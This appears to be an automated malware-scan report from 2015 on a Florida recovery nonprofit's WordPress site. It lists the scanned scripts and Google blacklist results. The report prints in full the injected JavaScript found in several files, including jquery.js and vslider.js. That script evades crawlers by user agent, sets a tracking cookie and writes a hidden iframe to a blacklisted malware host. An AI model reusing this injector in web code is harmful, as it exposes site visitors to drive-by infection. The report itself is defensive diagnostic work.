Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=floridiansforrecovery.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.floridiansforrecovery.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 18 Jan 2015 17:18:26 GMT Location: http://floridiansforrecovery.org/ Server: Apache/2.2.22 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://floridiansforrecovery.org/xmlrpc.php X-Powered-By: PHP/5.3.29 | clean |
http://floridiansforrecovery.org/ | 200 OK Content-Length: 53077 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var srcURL = 'http://saas.insitebar.com/vw'; SL = {siteId : 'Floridians for Recovery', renderQ: []}; (function(){ var d=document,e='createElement',a='appendChild',g='getElementsByTagName',i=d[e]('iframe'); i.id='VW-iframe'; i.style.display='none'; i.width=i.height='1px'; d[g]("body")[0][a](i); SL.x = function(w) { var d=w.document, s=d[e]("script"); s.type="text/javascript"; s.async=true; s.src=('https:'==d.location.protocol?srcURL.replace('http:','https:') : srcURL)+'/lava/sociaLava.js.jsp?siteId='+SL.siteId;d[g]("head")[0][a](s); }; var c = i.contentWindow.document; ...[665 bytes skipped]... | ||
http://floridiansforrecovery.org/wp-content/plugins/business-directory//main.js?ver=4.0.1 | 200 OK Content-Length: 7238 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: db59f01cb.weaponssafetycourse.com.au ...[185 bytes skipped]... on(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","Linux","AppleWebKit","Windows NT 6.3","Mobile","Safari","Googlebot","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("flippi_flor")===undefined);if(!d()&&c){document.write('<iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="flippi_flor=1; path=/; expires="+a.toUTCString()}})(); var bizdir_yourInfo_autofill = "For us to contact you..."; var bizdir_description_autofill = "Please enter a brief (800 characters or less) description of the organization ( ...[3202 bytes skipped]... Decoded script: <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3 This URL is marked by Google as suspicious <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://floridiansforrecovery.org/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96877 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: db59f01cb.weaponssafetycourse.com.au ...[185 bytes skipped]... on(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","Linux","AppleWebKit","Windows NT 6.3","Mobile","Safari","Googlebot","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("flippi_flor")===undefined);if(!d()&&c){document.write('<iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="flippi_flor=1; path=/; expires="+a.toUTCString()}})(); !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a w ...[2982 bytes skipped]... Decoded script: <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3 This URL is marked by Google as suspicious <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://floridiansforrecovery.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8270 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: db59f01cb.weaponssafetycourse.com.au ...[185 bytes skipped]... on(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","Linux","AppleWebKit","Windows NT 6.3","Mobile","Safari","Googlebot","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("flippi_flor")===undefined);if(!d()&&c){document.write('<iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="flippi_flor=1; path=/; expires="+a.toUTCString()}})(); jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&& ...[3093 bytes skipped]... Decoded script: <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3 This URL is marked by Google as suspicious <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://floridiansforrecovery.org/wp-content/plugins/continuous-rss-scrolling/continuous-rss-scrolling.js?ver=4.0.1 | 200 OK Content-Length: 2035 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/themes/infocus/lib/scripts/custom.js?ver=2.8 | 200 OK Content-Length: 51588 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/themes/infocus/lib/scripts/cufon-yui.js?ver=2.8 | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/themes/infocus/lib/scripts/fonts/philosopher.js?ver=2.8 | 200 OK Content-Length: 128652 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/plugins/dk-new-medias-image-rotator-widget/js/jquery.imagesloaded.js?ver=4.0.1 | 200 OK Content-Length: 1170 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/plugins/dk-new-medias-image-rotator-widget/js/dk-image-rotator-widget.js?ver=4.0.1 | 200 OK Content-Length: 6476 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/plugins/jquery-t-countdown-widget/js/jquery.t-countdown.js?ver=1.5.1 | 200 OK Content-Length: 6591 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/plugins/page-layout-builder/bootstrap/js/bootstrap.min.js?ver=4.0.1 | 200 OK Content-Length: 29110 Content-Type: application/javascript | clean |
http://floridiansforrecovery.org/wp-content/plugins/vslider/js/vslider.js?ver=4.0.1 | 200 OK Content-Length: 16483 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: db59f01cb.weaponssafetycourse.com.au ...[185 bytes skipped]... on(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","Linux","AppleWebKit","Windows NT 6.3","Mobile","Safari","Googlebot","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("flippi_flor")===undefined);if(!d()&&c){document.write('<iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="flippi_flor=1; path=/; expires="+a.toUTCString()}})(); (function($) { var params = new Array; var order = new Array; var images = new Array; var links = new Array; var linksTarget ...[3428 bytes skipped]... Decoded script: <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3 This URL is marked by Google as suspicious <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://floridiansforrecovery.org/wp-includes/js/tw-sack.min.js?ver=1.6.1 | 200 OK Content-Length: 4337 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: db59f01cb.weaponssafetycourse.com.au ...[185 bytes skipped]... on(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","Linux","AppleWebKit","Windows NT 6.3","Mobile","Safari","Googlebot","IEMobile"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("flippi_flor")===undefined);if(!d()&&c){document.write('<iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="flippi_flor=1; path=/; expires="+a.toUTCString()}})(); function sack(file){this.xmlhttp=null,this.resetData=function(){this.method="POST",this.queryStringSeparator="?",this.argumentSeparator="&",this.URLString="",this.encodeURIS ...[3161 bytes skipped]... Decoded script: <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"></iframe> Malicious iFrame found. size: 143x143 src: http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3 This URL is marked by Google as suspicious <iframe src="http://db59f01cb.weaponssafetycourse.com.au/publionline17.html?seb3" style="top: -999px;left: -1002px;border-top-width: 5px;position: absolute;border-left-width: 3px;" height="143" width="143"> | ||
http://floridiansforrecovery.org/wp-content/plugins/rotating-image-widget/includes/riw.js?ver=1.0 | 200 OK Content-Length: 1750 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: floridiansforrecovery.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Jan 2015 17:18:29 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://floridiansforrecovery.org/>; rel=shortlink
X-Pingback: http://floridiansforrecovery.org/xmlrpc.php
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: floridiansforrecovery.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 18 Jan 2015 17:18:29 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://floridiansforrecovery.org/>; rel=shortlink
X-Pingback: http://floridiansforrecovery.org/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: floridiansforrecovery.org
Referer: http://www.google.com/search?q=floridiansforrecovery.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: floridiansforrecovery.org
Referer: http://www.google.com/search?q=floridiansforrecovery.org
Result:
The result is similar to the first query. There are no suspicious redirects found.